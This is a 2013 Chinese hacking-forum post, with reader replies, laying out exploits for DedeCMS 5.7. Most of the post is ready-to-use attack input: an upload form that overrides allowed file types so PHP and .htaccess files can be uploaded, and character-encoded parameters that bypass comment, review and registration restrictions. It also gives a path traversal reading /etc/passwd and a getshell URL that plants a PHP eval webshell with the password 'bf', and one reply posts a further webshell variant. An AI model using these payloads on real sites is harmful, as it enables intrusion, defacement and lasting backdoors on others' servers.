我来说说最新这个dedecms getshell 不成功的原因吧

2013-06-08 12:09:48 71 9720 7
如题直接给代码
data/config.cache.inc.php
$cfg_mysql_type = 'mysql';
include/common.inc.php
//引入数据库类
if ($GLOBALS['cfg_mysql_type'] == 'mysqli' && function_exists("mysqli_init")) //如果配置的是 mysql 或者 mysqli_init() 支持这个函数 都是可以成功的
{
    require_once(DEDEINC.'/dedesqli.class.php');
} else {
    require_once(DEDEINC.'/dedesql.class.php'); //漏洞文件出在这里 具体不分析了
}
写个主要是看到很多人唧唧歪歪 的说什么不行 骗子什么的 不懂表乱说 多看几行代码!
多说一句 只对dede5.7 有效 dede5.6 因为官方重新封装了chr 函数
但是 在调用这个chr 函数的时候没有成功 会爆路径

虽然自己在很早前也发现了这个漏洞 但是 既然漏洞已经公布 我也马后炮一下吧 自己当成写了几个exp 但是没有前一位基友写的好
$cfg_mb_addontype = 'swf|mpg|mp3|rm|rmvb|wmv|wma|wav|mid|mov|zip|rar|doc|xsl|ppt|wps';
覆盖 $cfg_mb_addontype 的上传漏洞
<form name="form1" action="http://loalhost/member/uploads_add.php?arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=109&arrs1[]=98&arrs1[]=95&arrs1[]=97&arrs1[]=100&arrs1[]=100&arrs1[]=111&arrs1[]=110&arrs1[]=116&arrs1[]=121&arrs1[]=112&arrs1[]=101&arrs2[]=124&arrs2[]=46&arrs2[]=104&arrs2[]=116&arrs2[]=97&arrs2[]=99&arrs2[]=99&arrs2[]=101&arrs2[]=115&arrs2[]=115&arrs2[]=13&arrs2[]=10&arrs2[]=124&arrs2[]=97&arrs2[]=115&arrs2[]=97&arrs2[]=124&arrs2[]=99&arrs2[]=100&arrs2[]=120&arrs2[]=124&arrs2[]=99&arrs2[]=101&arrs2[]=114&arrs2[]=124&arrs2[]=97&arrs2[]=115&arrs2[]=104&arrs2[]=120&arrs2[]=124&arrs2[]=112&arrs2[]=104&arrs2[]=116&arrs2[]=109&arrs2[]=108&arrs2[]=124&arrs2[]=80&arrs2[]=32&arrs2[]=104&arrs2[]=112&arrs2[]=124&arrs2[]=80&arrs2[]=32&arrs2[]=72&arrs2[]=80&arrs2[]=124&arrs2[]=80&arrs2[]=104&arrs2[]=112&arrs2[]=124&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=124" method="post" enctype="multipart/form-data" >
  <input type="hidden" name="mediatype" value="4" />
  <input type="hidden" name="dopost" value="save" />
  <input name="addonfile" type="file" id="addonfile" />
  <button class="button2" type="submit" >提交</button><br>
1,必须登陆用户。<br>
2,将待上传PHP文件扩展名改为“P hp”。即可上传Php<br>
3,其他|.htaccess |asa|cdx|cer|ashx|phtml直接上传<br>
</form>
还记得我上次发的 feedback.php 文件 2次注入么? 虽然我当初没有绕过60个字节 但是还有xss 嘛
但是很多基友说 评论关闭了 不允许游客 发表 很鸡肋 ---------- 真的很鸡肋么
系统已经禁止评论功能!

&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=102&arrs1[]=101&arrs1[]=101&arrs1[]=100&arrs1[]=98&arrs1[]=97&arrs1[]=99&arrs1[]=107&arrs1[]=95&arrs1[]=102&arrs1[]=111&arrs1[]=114&arrs1[]=98&arrs1[]=105&arrs1[]=100&arrs2[]=99

绕过游客禁止评论

&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=102&arrs1[]=101&arrs1[]=101&arrs1[]=100&arrs1[]=98&arrs1[]=97&arrs1[]=99&arrs1[]=107&arrs1[]=95&arrs1[]=103&arrs1[]=117&arrs1[]=101&arrs1[]=115&arrs1[]=116&arrs2[]=99

还有要审核后才能看  办法总是有的
过审核:

feedback.php?aid=609&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=102&arrs1[]=101&arrs1[]=101&arrs1[]=100&arrs1[]=98&arrs1[]=97&arrs1[]=99&arrs1[]=107&arrs1[]=99&arrs1[]=104&arrs1[]=101&arrs1[]=99&arrs1[]=107&arrs2[]=99

上次有基友发布了一个dede 包含漏洞
又很多人说关闭了会员很鸡肋
我就不说 绕过会员关闭
/plus/carbuyaction.php?dopost=return&code=../../../../../../../../../etc/passwd%00&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=109&arrs1[]=98&arrs1[]=95&arrs1[]=111&arrs1[]=112&arrs1[]=101&arrs1[]=110&arrs1[]=99&_REQUEST[code]=alipay

再来一发 会员开启 禁止注册绕过

member/index_do.php?fmdo=user&dopost=regnew&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=109&arrs1[]=98&arrs1[]=95&arrs1[]=97&arrs1[]=108&arrs1[]=108&arrs1[]=111,&arrs1[]=119&arrs1[]=114&arrs1[]=101&arrs1[]=103&arrs2[]=99

汗珍藏了快一年的0day 就这样消失了

给最新getshell exp

这个是 imspider 给出的方法 很赞 是update 的方法 有点缺陷 听说有大牛找了insert 的方法  想要的自己去找吧
http://localhost/uploads/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=64&arrs2[]=102&arrs2[]=111&arrs2[]=112&arrs2[]=101&arrs2[]=110&arrs2[]=40&arrs2[]=34&arrs2[]=98&arrs2[]=102&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=34&arrs2[]=44&arrs2[]=32&arrs2[]=92&arrs2[]=39&arrs2[]=97&arrs2[]=92&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=119&arrs2[]=114&arrs2[]=105&arrs2[]=116&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=44&arrs2[]=32&arrs2[]=92&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=64&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=98&arrs2[]=102&arrs2[]=93&arrs2[]=41&arrs2[]=32&arrs2[]=63&arrs2[]=62&arrs2[]=92&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=101&arrs2[]=99&arrs2[]=104&arrs2[]=111&arrs2[]=32&arrs2[]=34&arrs2[]=79&arrs2[]=75&arrs2[]=34&arrs2[]=59&arrs2[]=64&arrs2[]=102&arrs2[]=99&arrs2[]=108&arrs2[]=111&arrs2[]=115&arrs2[]=101&arrs2[]=40&arrs2[]=36&arrs2[]=102&arrs2[]=112&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=35

http://localhost/uploads/plus/mytag_js.php?aid=1
看源代码 如果返回 ok 就表示 成功
http://localhost/uploads/plus/bf.php 密码 bf


找后台? 又这个必要么???????????

关于作者

冰封35篇文章787篇回复

评论71次

要评论?请先  登录  或  注册
  • 51楼
    2013-6-9 12:20

    dede从来没让人省过心。。

  • 50楼
    2013-6-9 10:22

    表示你们很强悍的说

  • 49楼
    2013-6-9 10:04

    分析的好。

  • 48楼
    2013-6-9 08:47

    内容很多啊!

  • 47楼
    2013-6-9 03:31

    这个给力~

  • 46楼
    2013-6-9 03:11

    技术交流坛子,不是用来炫耀的,

  • 45楼
    2013-6-9 02:10

    表示绕过注册测试了十几个 都没成功

  • 44楼
    2013-6-9 01:04

    顶帖不发经验不发感想的最无耻了- -~ 另 感谢楼主分享

  • 43楼
    2013-6-9 00:12

    rosi网站反应太tm快了 我表示还是木有能力搞定 ╮(╯▽╰)╭

  • 42楼
    2013-6-8 23:59

    我擦 冰封大牛啊,那必须捧场。。

  • 41楼
    2013-6-8 23:53

    好谢基友 我试试ing

  • 40楼
    2013-6-8 23:42

    学xi了,谢谢分享

  • 39楼
    2013-6-8 23:39

    可以啊 mytag` SET `normbody` = '{dede:php}file_put_contents(''../data/bf.php'',''<?php eval($_POST[bf]);?>'');{/dede:php}' WHERE `aid` =1# 编码下 &arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=47&arrs2[]=46&arrs2[]=46&arrs2[]=47&arrs2[]=100&arrs2[]=97&arrs2[]=116&arrs2[]=97&arrs2[]=47&arrs2[]=98&arrs2[]=102&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=98&arrs2[]=102&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=35

  • 38楼
    2013-6-8 23:13

    这个能改改生产目录么?生产在data下吧 球指导

  • 37楼
    2013-6-8 23:09

    小弟也来了t00ls 等会发你们玩玩

  • 36楼
    2013-6-8 21:39

    不会把?那么高的几率

  • 35楼
    2013-6-8 21:13

    很多都手动阉割了- -

  • 34楼
    2013-6-8 20:07

    uploads/plus这个目录的dede找了大概50多个都没有

  • 33楼
    2013-6-8 17:42

    按道理是随便执行什么sql命令了 但是测试一直没成功

  • 32楼
    2013-6-8 17:24

    敢问你是写data 目录下 mytag-1.html 的么 我发现 data 目录一般都有写权限